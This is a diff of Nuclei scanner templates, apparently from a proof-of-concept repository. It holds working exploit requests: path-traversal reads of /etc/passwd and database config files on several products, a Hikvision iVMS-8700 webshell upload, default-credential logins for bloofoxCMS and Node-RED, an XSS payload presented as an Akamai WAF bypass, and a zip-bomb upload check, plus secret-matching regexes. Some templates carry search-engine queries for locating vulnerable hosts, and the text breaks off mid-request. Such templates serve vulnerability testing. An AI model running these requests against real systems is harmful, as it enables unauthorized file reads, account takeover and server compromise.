"AIza[0-9A-Za-z\\\\-_]{35}" + - "EAACEdEose0cBA[0-9A-Za-z]+" - type: regex - name: google-cloud-platform-api-key + name: facebook-client-id regex: - - "(?i)(google|gcp|youtube|drive|yt)(.{0,20})?['\\\"][AIza[0-9a-z\\\\-_]{35}]['\\\"]" + - "(?i)(facebook|fb)(.{0,20})?['\\\"][0-9]{13,17}" - type: regex - name: google-oauth + name: facebook-oauth regex: - - "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" + - "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]" - type: regex - name: google-oauth-access-token + name: facebook-secret-key regex: - - "ya29\\\\.[0-9A-Za-z\\\\-_]+" + - "(?i)(facebook|fb)(.{0,20})?(?-i)['\\\"][0-9a-f]{32}" diff --git a/poc/java/default-apache-shiro.yaml b/poc/java/default-apache-shiro.yaml new file mode 100644 index 0000000000..259a94706c --- /dev/null +++ b/poc/java/default-apache-shiro.yaml @@ -0,0 +1,29 @@ +id: default-apache-shiro + +info: + name: Apache Shiro Default Page + author: DhiyaneshDK + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"Apache Shiro Quickstart" + tags: tech,apache,shiro + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache Shiro Quickstart" + + - type: status + status: + - 200 + +# digest: 490a0046304402206679e43f4e2125fa6ab7f37680f2c0464b2b7251690168259de5ac9c1f18fb51022071a731cd2862bb734edb2e7491f15198961599fa7ed8cb84bfa49805b92df0f3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/java/tomcat-stacktraces.yaml b/poc/java/tomcat-stacktraces.yaml index 876539da2d..0f7b97d0f1 100644 --- a/poc/java/tomcat-stacktraces.yaml +++ b/poc/java/tomcat-stacktraces.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Apache Tomcat" - tags: tech,tomcat,apache + tags: misconfig,tech,tomcat,apache http: - method: GET @@ -24,5 +24,4 @@ http: - 'contains(body, "org.apache")' - status_code == 400 condition: and - -# digest: 490a004630440220572e2b9041be621d66d3b022211cce1f42722ddb282c272ac5473ada2a5d725e02200538acfc5a3bce45b1698ca25c662be74514ea7138deb20e34ad21d908a4ce89:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100acbebae47fea74944e9c0ecc1ab66fca13dd7c4dbd8771d5601fed9db72a0cf0022100b63d7e443f534f20cbad1632af42b8c663ab034e41b5efeb67ff784e3ea3802f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/javascript/custom-css-js-php.yaml b/poc/javascript/custom-css-js-php.yaml new file mode 100644 index 0000000000..efbbeaf2e4 --- /dev/null +++ b/poc/javascript/custom-css-js-php.yaml @@ -0,0 +1,59 @@ +id: custom-css-js-php + +info: + name: > + Custom CSS, JS & PHP <= 2.0.7 - Cross-Site Request Forgery Bypass + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/custom-css-js-php/" + google-query: inurl:"/wp-content/plugins/custom-css-js-php/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,custom-css-js-php,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-css-js-php/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-css-js-php" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.7') \ No newline at end of file diff --git a/poc/javascript/ojs-installer.yaml b/poc/javascript/ojs-installer.yaml index 475df3c1b2..6d3f4b7439 100644 --- a/poc/javascript/ojs-installer.yaml +++ b/poc/javascript/ojs-installer.yaml @@ -4,6 +4,7 @@ info: name: Open Journal Systems Installer - Exposure author: DhiyaneshDK severity: high + description: Open Journal Systems is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 2 @@ -28,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a73a5709ab5c8ffc95f1edb4434f2ef96a93e741785901596f6864bdcfa563d5022100f88c3bfbc5d5b8cce6a260f47f8100f4f58f0ab7ede9bbb5bcd59ae0bd789c0a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009f6ccce9560273afe2ff39ce76b4e4763a54d111855520c5310097bad41b820e022100aa5c15214f4bb1d146046ae5597dd068d8bd5fce23b91b0790dd3dfde6361c50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/joomla/joomla-config-dist-file.yaml b/poc/joomla/joomla-config-dist-file.yaml old mode 100755 new mode 100644 index 023399c215..676958e944 --- a/poc/joomla/joomla-config-dist-file.yaml +++ b/poc/joomla/joomla-config-dist-file.yaml @@ -1,35 +1,31 @@ id: joomla-config-dist-file + info: name: Joomla Config Dist File - author: - - l0ne1y - description: |- - joomla配置文件泄露 - php-dist是Joomla创建的用来保存Joomla设置的文件,未经允许的访问会导致敏感信息泄露 + author: oppsec severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序: - http://www.joomla.org/ - 临时修复方案: - 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 - 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + description: configuration.php-dist is a file created by Joomla to save Joomla settings. + tags: config,exposure,joomla + requests: -- matchers: - - type: word - condition: and - words: - - Joomla - - JConfig - - '@package' - - type: word - part: header - words: - - text/plain - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/configuration.php-dist' - method: GET + - method: GET + path: + - "{{BaseURL}}/configuration.php-dist" + + matchers-condition: and + matchers: + - type: word + words: + - "Joomla" + - "JConfig" + - "@package" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 diff --git a/poc/local_file_inclusion/acti-video-lfi.yaml b/poc/local_file_inclusion/acti-video-lfi.yaml new file mode 100644 index 0000000000..e5dcc8dca8 --- /dev/null +++ b/poc/local_file_inclusion/acti-video-lfi.yaml @@ -0,0 +1,39 @@ +id: acti-video-lfi + +info: + name: ACTi-Video Monitoring - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + ACTI video surveillance has loopholes in reading any files + reference: + - https://www.cnblogs.com/hmesed/p/16292252.html + metadata: + verified: true + max-request: 1 + shodan-query: title:"Web Configurator" + fofa-query: app="ACTi-视频监控" + tags: acti,lfi,iot,video,monitoring + +http: + - method: GET + path: + - "{{BaseURL}}/images/../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100b740ba6fc1aece72e634dd7f2c10ac3d13ca38392f48f8ac1470efbc64891fae022100a05aead43e2ec6f1973fdb9b3c5dea959517f6edea370fbbafba94b698b9331e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/kingsoft-vgm-lfi.yaml b/poc/local_file_inclusion/kingsoft-vgm-lfi.yaml new file mode 100644 index 0000000000..a76d986b40 --- /dev/null +++ b/poc/local_file_inclusion/kingsoft-vgm-lfi.yaml @@ -0,0 +1,39 @@ +id: kingsoft-vgm-lfi + +info: + name: Kingsoft VGM Antivirus - Arbitrary File Read + author: abbas.heybati + severity: high + description: | + There is an arbitrary file reading vulnerability in Kingsoft Antivirus. An attacker can obtain any file on the server through the vulnerability. + reference: + - https://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486073&idx=1&sn=8e61e162262585bb8ce973b61df989b4&chksm=c1f925cbf68eacddfe441b8f1861e88068039712e467fb9bbe91eae31d439286c7147d197b07 + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/kongsoft-vgm-antivirus-wall-rce.yaml + metadata: + verified: true + max-request: 1 + fofa-query: title="金山VGM防毒墙" + tags: kingsoft,vgm,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/downFile.php?filename=../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/force-download" + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100f2502080be7eb0c3cc36d778e65dac2e50b2dc8930e92e8253154de9305015ab0220536c3849100109e24770d3ade708928f6be51ee39cb53ef97cb149042ae724c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/sangfor-ngaf-lfi.yaml b/poc/local_file_inclusion/sangfor-ngaf-lfi.yaml new file mode 100644 index 0000000000..142ad12c55 --- /dev/null +++ b/poc/local_file_inclusion/sangfor-ngaf-lfi.yaml @@ -0,0 +1,42 @@ +id: sangfor-nextgen-lfi + +info: + name: Sangfor Next Gen Application Firewall - Arbitary File Read + author: DhiyaneshDk + severity: high + description: | + Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter. + reference: + - https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/ + metadata: + verified: true + max-request: 1 + fofa-query: title="SANGFOR | NGAF" + tags: sangfor,lfi + +http: + - raw: + - | + GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1 + Host: {{Hostname}} + y-forwarded-for: 127.0.0.1 + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0" + + - type: word + part: header + words: + - 'filename="passwd"' + - 'application/octet-stream' + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402202cfdd0a7a3b428ae596b4c3c2585bdfca6af1d52d6bae1bd48607673cfcf61a702201405d5b3d2ba9179e851823ff6f7839a50c368493c42717e9dfb1fce07963e22:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/weaver-officeserver-lfi.yaml b/poc/local_file_inclusion/weaver-officeserver-lfi.yaml new file mode 100755 index 0000000000..4e1aa20a48 --- /dev/null +++ b/poc/local_file_inclusion/weaver-officeserver-lfi.yaml @@ -0,0 +1,35 @@ +id: weaver-officeserver-lfi + +info: + name: OA E-Office officeserver.php Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file reading vulnerability in the OA E-Office officeserver.php file. An attacker can download any file on the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20officeserver.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-EOffice" + tags: weaver,e-cology,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "datapassword =" + - "datauser =" + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100fb9aeeb75f2885f9cc403726aa4d125ca77e8facb6edec2abaffd3cafd4b4509022100e2c4560b8ffe79150e0285b4fa87e5cc1c59869c3c34f7153bd336365e6dc3b3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/weaver-signaturedownload-lfi.yaml b/poc/local_file_inclusion/weaver-signaturedownload-lfi.yaml new file mode 100755 index 0000000000..5d042369f3 --- /dev/null +++ b/poc/local_file_inclusion/weaver-signaturedownload-lfi.yaml @@ -0,0 +1,42 @@ +id: weaver-signaturedownload-lfi + +info: + name: OA E-Weaver SignatureDownLoad - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file reading vulnerability in the E-Weaver SignatureDownLoad interface of Panwei OA. An attacker can read any file on the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-E-Weaver" + tags: ecology,weaver,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DriverClasses" + - "ecology.password" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + - "markPicture.jpg" + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a004830460221009c7c7fbcc6408d7a1d23b362176285fb7d990fd0b0b5785b7235a8a8304ef38a022100e87911cec4d1ab35b9459482066c0fb80c90ccc0bb05850c8e4621645ddae578:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/weaver-sptmforportalthumbnail-lfi.yaml b/poc/local_file_inclusion/weaver-sptmforportalthumbnail-lfi.yaml new file mode 100755 index 0000000000..36d8cc98dd --- /dev/null +++ b/poc/local_file_inclusion/weaver-sptmforportalthumbnail-lfi.yaml @@ -0,0 +1,41 @@ +id: weaver-sptmforportalthumbnail-lfi + +info: + name: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading. + reference: + - http://124.223.89.192/archives/e-cology8-14 + - https://github.com/GREENHAT7/pxplan/blob/main/xray_pocs/yaml-poc-weaver-weaver_e_cology_oa-readfile-CT-479157.yml + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-E-Weaver" + tags: weaver,e-cology,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "weaver.general.BaseBean" + - "getServletConfig" + condition: and + + - type: word + part: header + words: + - "image/png" + + - type: status + status: + - 200 + +# digest: 4a0a004730450220781ac3c5267b2f1315f8f10652cbfe1c4aaefd5b665e5e33b1b02617218dcce5022100e65c3fce695fe99f73741f270f84b9b53c5400a46d7e6e84908dfcd5180ea22d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/yonyou-ufida-nc-lfi.yaml b/poc/local_file_inclusion/yonyou-ufida-nc-lfi.yaml new file mode 100644 index 0000000000..217e6d4453 --- /dev/null +++ b/poc/local_file_inclusion/yonyou-ufida-nc-lfi.yaml @@ -0,0 +1,34 @@ +id: yonyou-ufida-nc-lfi + +info: + name: UFIDA NC Portal - Arbitrary File Read + author: DhiyaneshDk + severity: high + description: | + There is any file reading in the getFileLocal interface of UFIDA Mobile System Management. + reference: + - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8B%E7%A7%BB%E5%8A%A8%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86getFileLocal%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.md + metadata: + verified: true + max-request: 1 + fofa-query: app="用友-移动系统管理" + tags: yonyou,ufida,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "nc.bs.framework.server.WebApplicationStartupHook" + - "]>&test;111112331%' union select md5({{num}})# + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5(num)}}' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100cea2e8608523d9fe561e07db80006e0d8180bb73866ce3ee77dcdbcbd911aa6002210095f263df205d9637e3943b658e48c91bcffd1e723ed3809ccd177d9283fab7f4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7f081b05e0..7e328a8b1b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml @@ -1,48 +1,50 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" Content-Type: image/jpeg - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + GET /eps/upload/{{name}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: res_id + name: name json: - ".data.resourceUuid" internal: true matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - '{{randstr}}' diff --git a/poc/microsoft/bloofoxcms-default-login.yaml b/poc/microsoft/bloofoxcms-default-login.yaml new file mode 100644 index 0000000000..94317594f5 --- /dev/null +++ b/poc/microsoft/bloofoxcms-default-login.yaml @@ -0,0 +1,42 @@ +id: bloofoxcms-default-login + +info: + name: bloofoxCMS - Default Login + author: theamanrawat + severity: high + description: | + bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://www.bloofox.com/automated_setup.113.html + - https://www.bloofox.com + metadata: + verified: "true" + max-request: 1 + fofa-query: "Powered by bloofoxCMS" + tags: bloofox,cms,default-login + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - contains(body, 'bloofoxCMS Admincenter') + - status_code == 200 + condition: and + +# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/microsoft/ms-exchange-user-enum.yaml b/poc/microsoft/ms-exchange-user-enum.yaml index ae17add9ab..e5b50fad8b 100644 --- a/poc/microsoft/ms-exchange-user-enum.yaml +++ b/poc/microsoft/ms-exchange-user-enum.yaml @@ -36,6 +36,5 @@ http: part: header group: 1 regex: - - '(?i)Email=([A-Za-z0-9@%.-]+)' - -# digest: 4a0a00473045022047f3fcaeec7ba32081ea40264abacc7be7ca55431bed8b2e842c20c6cd5ff0b0022100ddc679fb703c5fee168620fa4656045fe6a6bf3cbffb3b0af3475246e58ef9d8:922c64590222798bb761d5b6d8e72950 + - '(?i)Email=([A-Za-z0-9@%.-_]+)' +# digest: 4b0a00483046022100fa802c6a26e51ad0676a8328798a1bc0499ce3f0849d70480ea6b221663a54cc0221008bc2ebb595c31754153f5db660c3ed317d417abfca2795a855c49d5b6b1c0232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/microsoft/yzmcms-installer.yaml b/poc/microsoft/yzmcms-installer.yaml index 27c5a9f70b..f07cdce46b 100644 --- a/poc/microsoft/yzmcms-installer.yaml +++ b/poc/microsoft/yzmcms-installer.yaml @@ -4,6 +4,7 @@ info: name: YzmCMS - Installer author: ritikchaddha severity: high + description: YzmCMS is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -35,5 +36,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100abaead347b32ff2b304417855c674e046e1a3cb9fc8578529ff2709b98042d1802202677f8a402cef74cb69d5f9ed49ec3bef0d54ea0409173c2fc674c52b9300a0a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220115b33497f0588b82da07382818c3838389b11d86165aacc007740c2ac01c1d50221008dab4fc62cabd1fb70c967a32b1e31a6b1e08187e0f7bbf1bb1cbae75a193125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/microsoft/zzzcms-info-disclosure.yaml b/poc/microsoft/zzzcms-info-disclosure.yaml new file mode 100644 index 0000000000..a79ec2a893 --- /dev/null +++ b/poc/microsoft/zzzcms-info-disclosure.yaml @@ -0,0 +1,42 @@ +id: zzzcms-info-disclosure + +info: + name: Zzzcms 1.75 - Information Disclosure + author: ritikchaddha + severity: low + description: | + There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\webuploader\js\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore + reference: + - https://xz.aliyun.com/t/7414 + metadata: + verified: true + max-request: 1 + shodan-query: html:"ZzzCMS" + fofa-query: title="ZzzCMS" + tags: zzzcms,info,disclosure + +http: + - raw: + - | + GET /plugins/webuploader/js/webconfig.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'var adminpath' + - 'var imageMaxSize=' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# digest: 4a0a0047304502202a3a4916c5fadccff982078fec5a98de45b89076f013e080cad56b7f25fd7327022100bc6f7789895c6bb952913f2990bb4214961e49148417b7b16e969c14585ea09d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/mysql/mysql-history.yaml b/poc/mysql/mysql-history.yaml new file mode 100644 index 0000000000..3842f59d4e --- /dev/null +++ b/poc/mysql/mysql-history.yaml @@ -0,0 +1,54 @@ +id: mysql-history + +info: + name: Mysql History - File Disclosure + author: kazet + severity: low + description: | + The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands. + reference: + - http://doc.docs.sk/mysql-refman-5.5/mysql-history-file.html + metadata: + verified: true + max-request: 1 + shodan-query: html:"mysql_history" + tags: misconfig,disclosure,config + +http: + - method: GET + path: + - "{{BaseURL}}/.mysql_history" + + matchers-condition: and + matchers: + - type: word + words: + - "_HiStOrY_V2_" + - "show databases;" + condition: or + + - type: word + part: header + words: + - "application/octet-stream" + - "text/plain" + - "filename=\".mysql_" + + - type: word + part: response + words: + - "" + - "text/html" + - "image/" + negative: true + + - type: status + status: + - 200 + +# digest: 490a0046304402204a3e73fd4764e2ab60a4edeb79644228fa98d42ac7ccea958bde5dd4a124fbeb02201f70da8af717f2a5d68b47ecbcddc16b8692f9d3e8821a28cdf3f0db6dfe46b6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/mysql/weaver-mysql-config-info-leak.yaml b/poc/mysql/weaver-mysql-config-info-leak.yaml new file mode 100644 index 0000000000..85dad0d119 --- /dev/null +++ b/poc/mysql/weaver-mysql-config-info-leak.yaml @@ -0,0 +1,30 @@ +id: weaver-mysql-config-exposure + +info: + name: OA E-Office mysql_config.ini - Information Disclosure + author: SleepingBag945 + severity: high + description: | + E-Office mysql_config.ini file can be directly accessed, leaking database account password and other information + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-EOffice" + tags: ecology,weaver,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/mysql_config.ini" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header,"text/plain")' + - 'contains_all(body,"datapassword", "datauser")' + condition: and + +# digest: 4a0a00473045022003d14acb438bcd3ddfaab392c67ae2d0fd30ddbe80da964d403b0403eee025dd022100d6c9d8d5b6864cd317a1b28d3c9a5eeb35e4a0bbfb64a43f01c526d2a5e63070:922c64590222798bb761d5b6d8e72950 diff --git a/poc/nodejs/nodered-default-login.yaml b/poc/nodejs/nodered-default-login.yaml new file mode 100644 index 0000000000..12548d6fb5 --- /dev/null +++ b/poc/nodejs/nodered-default-login.yaml @@ -0,0 +1,51 @@ +id: nodered-default-login + +info: + name: Node-Red - Default Login + author: savik + severity: critical + description: | + Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials. + reference: + - https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:321591353 + tags: default-login,node-red,dashboard + +http: + - raw: + - | + POST /auth/token HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + client_id=node-red-editor&grant_type=password&scope=&username={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - admin + password: + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'access_token":' + - 'expires_in":' + - 'token_type":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/oracle/xss-oracle.yaml b/poc/oracle/xss-oracle.yaml new file mode 100644 index 0000000000..10c054b913 --- /dev/null +++ b/poc/oracle/xss-oracle.yaml @@ -0,0 +1,22 @@ +id: xss-oracle + +info: + name: XSS Vulnerability with bypass Akamai WAF 8/11/2024 + author: 111xnagashy + severity: Medium + description: This template checks for an XSS vulnerability in the hidden input field where the 'oncontentvisibilityautostatechange' attribute is used full payload "\">". + tags: xss, WAF bypass, oa_html + +requests: + - method: GET + path: + - "{{BaseURL}}/OA_HTML/ibeCAcdLogin.jsp?username=ttttttttttt\">ttttttttttttttttt" + - "{{BaseURL}}/OA_HTML/ibeCAcdLogin.jsp?ref=ttttttttttt\">ttttttttttttttttt" + - "{{BaseURL}}/OA_HTML/ibeCAcpCustomLogin.jsp?ref=ttttttttttt\">ttttttttttttttttt" + - "{{BaseURL}}/OA_HTML/custibeCAcdPwdAssist.jsp?email=ttttttttttt\">ttttttttttttttttt" + redirects: false + matchers: + - type: word + words: + - "ttttttttttt\">ttttttttttttttttt" + part: body \ No newline at end of file diff --git a/poc/other/12.1.1.2.yaml b/poc/other/12.1.1.2.yaml new file mode 100644 index 0000000000..62b498760a --- /dev/null +++ b/poc/other/12.1.1.2.yaml @@ -0,0 +1,59 @@ +id: ASVS-4-0-3-V12-1-1-2 + +info: + name: ASVS 12.1.1.2 (Zipbomb) Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://github.com/ZerosunGitHub/zipbomb + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the application will not accept large files that could fill up storage or cause a denial of service. + +variables: + mode: "quoted_overlap" + num-files: 250 + compressed-size: 21179 + +code: + - engine: + - py + - python + - python3 + source: | + import subprocess + import sys + import os + + mode = os.getenv('mode') + num_files = os.getenv('num-files') + compressed_size = os.getenv('compressed-size') + subprocess.run([sys.executable, "code/source/zipbomb.py", f"--mode={mode}", f"--num-files={num_files}", f"--compressed-size={compressed_size}"]) + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; 